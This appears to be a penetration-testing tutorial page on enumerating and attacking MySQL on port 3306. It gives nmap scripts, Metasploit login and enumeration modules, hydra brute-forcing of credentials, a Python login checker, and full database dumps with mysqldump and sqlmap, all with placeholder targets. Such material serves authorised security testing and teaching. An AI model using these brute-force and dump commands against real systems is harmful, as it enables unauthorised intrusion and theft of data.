LinkedInGithub
Edit

MYSQL 3306

MySQL Enumeration and Scanning (Port 3306)

Step 1: Define the Target IP

Replace <target_ip> with the actual IP address of the target.

# Define the target IP
export TARGET_IP="192.168.1.100"

Step 2: Perform an Nmap Scan for MySQL Services

Basic Scan

nmap -p 3306 -sV --script mysql-* <target_ip>

Explanation:

  • -p 3306: Specifies the MySQL port.

  • -sV: Detects the service version.

  • --script mysql-*: Runs Nmap scripts related to MySQL.

Common Nmap Scripts for MySQL

  • mysql-info: Gathers MySQL server information.

  • mysql-users: Enumerates MySQL users.

  • mysql-databases: Enumerates databases (if credentials are provided).

  • mysql-empty-password: Checks for accounts with empty passwords.

Example:

nmap -p 3306 --script mysql-info,mysql-users,mysql-empty-password <target_ip>

Step 3: Enumerate MySQL Using Metasploit

  1. Launch Metasploit:

    msfconsole

  2. Use the MySQL login auxiliary module:

    use auxiliary/scanner/mysql/mysql_login
set RHOSTS <target_ip>
set USERNAME root
set PASSWORD <password>
run

  3. Use the MySQL enumeration module:

    use auxiliary/admin/mysql/mysql_enum
set RHOSTS <target_ip>
set USERNAME <username>
set PASSWORD <password>
run

Step 4: Connect to MySQL Manually

  1. Install the MySQL client (if not already installed):

    sudo apt install mysql-client

  2. Connect to the MySQL server:

    mysql -h <target_ip> -u <username> -p

    Replace <username> with the username and enter the password when prompted.

  3. Run SQL queries to enumerate databases, tables, and users:

    SHOW DATABASES;
USE <database_name>;
SHOW TABLES;
SELECT User, Host FROM mysql.user;

Step 5: Exploit Weak Credentials

  1. Use a brute-force tool like hydra:

    hydra -L usernames.txt -P passwords.txt -t 4 -f <target_ip> mysql

  2. Use a Python script for credential checking:

    import pymysql

target_ip = "<target_ip>"
username = "root"
password = "password"

try:
    conn = pymysql.connect(host=target_ip, user=username, password=password)
    print("[+] Successful login")
except:
    print("[-] Failed login")

Step 6: Dump Data Using Tools

mysqldump

  1. If credentials are available, dump data using mysqldump:

    mysqldump -h <target_ip> -u <username> -p --all-databases > dump.sql

sqlmap

  1. Run sqlmap for automated database exploitation:

    sqlmap -r request.txt --dbms=mysql --dump

Notes

  • Default MySQL root account might not be password-protected.

  • Look for sensitive data in dumped databases.

  • Always document credentials and configurations during enumeration.

  • Ensure tools like sqlmap, hydra, and nmap are installed for effective scanning.

PreviousMSSQL 1433,1434,2433NextNFS 2049

Last updated